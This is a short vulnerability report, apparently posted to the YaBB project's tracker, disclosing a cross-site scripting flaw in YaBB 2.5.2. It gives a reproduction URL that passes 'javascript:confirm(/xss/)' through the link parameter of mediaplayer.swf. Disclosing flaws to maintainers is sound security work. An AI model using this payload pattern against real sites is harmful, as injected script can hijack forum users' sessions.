Cross Site Scripting Vulnerability in YaBB 2.5.2
Free forum software
Brought to you by:
crackers8,
jonbservergeek
Hello,
I found a cross site scripting vulnerability in YaBB 2.5.2 source. here is the report
Vulnerability Type:
Cross site scripting
Vulnerable software and version
Yabb 2.5.2 (latest release)
Steps to reproduce:
http://localhost/mediaplayer.swf?file=http://content.bitsontherun.com/videos/bkaovAYt-364766.flv&autostart=false&image=http://appsec.ws/ExploitDB/cMon.jpg&linkfromdisplay=true&link=javascript:confirm(/xss/);//&linktarget=_blank&.swf
Browser:
Working perfectly on firefox 25.0
It has been solved?